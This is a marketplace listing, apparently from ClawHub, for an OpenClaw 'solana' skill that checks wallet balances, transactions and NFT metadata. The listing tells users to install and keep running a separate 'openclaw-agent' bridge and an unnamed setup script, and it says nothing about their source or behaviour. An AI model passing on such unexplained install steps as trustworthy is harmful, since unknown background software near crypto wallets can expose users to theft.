solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Efficiently interact with the Solana blockchain using the OpenClaw agent. Check balances, monitor wallets, track NFTs, and audit transactions with ease.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-7rrh8What This Skill Does
The Solana skill for OpenClaw provides a comprehensive interface for interacting with the Solana blockchain directly from your agent environment. It enables users to perform deep queries into wallet activities, including monitoring SOL balances, tracking SPL token holdings, auditing transaction history, and exploring NFT metadata. By leveraging native command-line tools like the Solana CLI and Metaboss, this skill abstracts the complexity of blockchain interaction, allowing you to fetch account data, verify transaction statuses, and manage custom RPC connections effortlessly. It is designed to work seamlessly with both Phantom and Solflare wallet addresses.
Installation
To begin, ensure you have the openclaw-agent utility installed according to your operating system requirements (Windows or macOS) as outlined in the documentation. Once the agent bridge is active, install the skill via the OpenClaw console using: clawhub install openclaw/skills/skills/hightower6eu/solana-7rrh8. After the installation, verify that your environment is configured by running the initial Solana setup script, which installs the necessary CLI dependencies and sets your default RPC to the official mainnet-beta endpoint.
Use Cases
This skill is ideal for developers, power users, and crypto enthusiasts who need to automate blockchain data collection. Common use cases include: 1) Tracking portfolio performance by monitoring token account balances programmatically. 2) Auditing transaction success rates for specific wallets. 3) Fetching metadata for NFT collections using the built-in Metaboss integration. 4) Setting up automated watchdogs for wallet address changes using the 'watch' functionality. 5) Debugging account data by switching between mainnet, devnet, and custom RPC providers.
Example Prompts
- "Check the current SOL balance for wallet address 5j6... and list all SPL tokens currently held in the account."
- "Monitor this wallet address for any new transactions and report back every 5 seconds until I tell you to stop."
- "Fetch the metadata for the NFT with mint address G1a... and display the token details in a readable format."
Tips & Limitations
Always ensure the openclaw-agent process is running in the background, as blockchain network requests will fail without the bridged connection. For high-frequency monitoring, be aware of RPC rate limits imposed by public endpoints; if you encounter errors, consider switching to a private or paid RPC provider. While the skill provides extensive read-only capabilities, always verify transaction signatures through official explorers before confirming sensitive financial actions.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-7rrh8": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.